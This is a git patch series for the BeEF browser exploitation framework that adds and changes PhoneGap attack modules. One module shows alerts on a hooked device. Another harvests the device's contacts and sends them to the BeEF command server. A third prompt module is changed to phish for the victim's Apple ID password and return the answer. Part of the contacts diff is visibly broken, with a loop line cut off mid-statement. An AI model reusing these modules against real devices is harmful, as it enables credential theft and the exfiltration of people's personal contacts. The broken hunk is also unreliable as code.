From 8ccc8f8b2e3bf5568d1b26cee910849aa3cf970c Mon Sep 17 00:00:00 2001 From: Sergey Gorbaty Date: Thu, 21 Aug 2014 11:20:19 -0700 Subject: [PATCH 1/3] New alert user module --- .../phonegap/phonegap_alert_user/command.js | 27 +++++++++++++ .../phonegap/phonegap_alert_user/config.yaml | 17 ++++++++ .../phonegap/phonegap_alert_user/module.rb | 39 +++++++++++++++++++ 3 files changed, 83 insertions(+) create mode 100644 modules/phonegap/phonegap_alert_user/command.js create mode 100644 modules/phonegap/phonegap_alert_user/config.yaml create mode 100644 modules/phonegap/phonegap_alert_user/module.rb diff --git a/modules/phonegap/phonegap_alert_user/command.js b/modules/phonegap/phonegap_alert_user/command.js new file mode 100644 index 000000000..1d287980a --- /dev/null +++ b/modules/phonegap/phonegap_alert_user/command.js @@ -0,0 +1,27 @@ +// +// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Phonegap_alert_user +// +beef.execute(function() { + var title = "<%== @title %>"; + var message = "<%== @message %>"; + var buttonName = "<%== @buttonName %>"; + + + function onAlert() { + result = "Alert dismissed"; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + } + + navigator.notification.alert( + message, + onAlert, + title, + buttonName + ); + +}); diff --git a/modules/phonegap/phonegap_alert_user/config.yaml b/modules/phonegap/phonegap_alert_user/config.yaml new file mode 100644 index 000000000..bd577f08a --- /dev/null +++ b/modules/phonegap/phonegap_alert_user/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_prompt_user +# +beef: + module: + phonegap_alert_user: + enable: true + category: "Phonegap" + name: "Alert User" + description: "Show user an alert" + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_alert_user/module.rb b/modules/phonegap/phonegap_alert_user/module.rb new file mode 100644 index 000000000..a47bc7f9d --- /dev/null +++ b/modules/phonegap/phonegap_alert_user/module.rb @@ -0,0 +1,39 @@ +# +# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_prompt_user +# + +class Phonegap_alert_user < BeEF::Core::Command + + def self.options + return [{ + 'name' => 'title', + 'description' => 'Alert title', + 'ui_label'=>'Title', + 'value' => 'Beef', + 'width' => '300px' + },{ + 'name' => 'message', + 'description' => 'Message', + 'ui_label'=>'Message', + 'value' => 'Game over!', + 'width' => '300px' + },{ + 'name' => 'buttonName', + 'description' => 'Default button name', + 'ui_label'=>'Button name', + 'value' => 'Done', + 'width' => '100px' + }] + end + + def callback + content = {} + content['Result'] = @datastore['result'] + save content + end + +end From 9942edc1187ffd251c8ec9c579fc8584b86d075e Mon Sep 17 00:00:00 2001 From: Sergey Gorbaty Date: Thu, 21 Aug 2014 11:20:48 -0700 Subject: [PATCH 2/3] Fixing bug when email or phone number is empty --- .../phonegap/phonegap_list_contacts/command.js | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/modules/phonegap/phonegap_list_contacts/command.js b/modules/phonegap/phonegap_list_contacts/command.js index bfb89c49c..2a190aed3 100644 --- a/modules/phonegap/phonegap_list_contacts/command.js +++ b/modules/phonegap/phonegap_list_contacts/command.js @@ -14,13 +14,17 @@ beef.execute(function() { for (var i=0; i", <%= @command_id %>, 'result='+result ); @@ -40,4 +44,4 @@ beef.execute(function() { navigator.contacts.find(fields, onSuccess, onError, options); -}); \ No newline at end of file +}); From 23eab81d2a7badfd0cea312c810a7e18c0d1de72 Mon Sep 17 00:00:00 2001 From: Sergey Gorbaty Date: Thu, 21 Aug 2014 11:22:19 -0700 Subject: [PATCH 3/3] Improved prompt module to include default text supported by Phonegap 2.8 --- modules/phonegap/phonegap_prompt_user/command.js | 5 ++++- modules/phonegap/phonegap_prompt_user/module.rb | 8 +++++++- 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/modules/phonegap/phonegap_prompt_user/command.js b/modules/phonegap/phonegap_prompt_user/command.js index db493d6d0..d75906fb8 100644 --- a/modules/phonegap/phonegap_prompt_user/command.js +++ b/modules/phonegap/phonegap_prompt_user/command.js @@ -12,6 +12,8 @@ beef.execute(function() { var ans_yes = "<%== @ans_yes %>"; var ans_no = "<%== @ans_no %>"; var result = ''; + var def_text = "<%== @text %>"; + function onPrompt(results) { @@ -23,7 +25,8 @@ beef.execute(function() { question, onPrompt, title, - [ans_yes,ans_no] + [ans_yes,ans_no], + def_text ); }); diff --git a/modules/phonegap/phonegap_prompt_user/module.rb b/modules/phonegap/phonegap_prompt_user/module.rb index bb9fb7ff4..7fbf940a1 100644 --- a/modules/phonegap/phonegap_prompt_user/module.rb +++ b/modules/phonegap/phonegap_prompt_user/module.rb @@ -20,7 +20,7 @@ class Phonegap_prompt_user < BeEF::Core::Command 'name' => 'question', 'description' => 'Prompt question', 'ui_label'=>'Question', - 'value' => 'Please enter your Apple ID', + 'value' => 'Please enter your Apple ID password', 'width' => '300px' },{ 'name' => 'ans_yes', @@ -34,6 +34,12 @@ class Phonegap_prompt_user < BeEF::Core::Command 'ui_label'=>'No', 'value' => 'Cancel', 'width' => '100px' + },{ + 'name' => 'text', + 'description' => 'Default text to display', + 'ui_label'=>'Default text', + 'value' => 'Password', + 'width' => '100px' }] end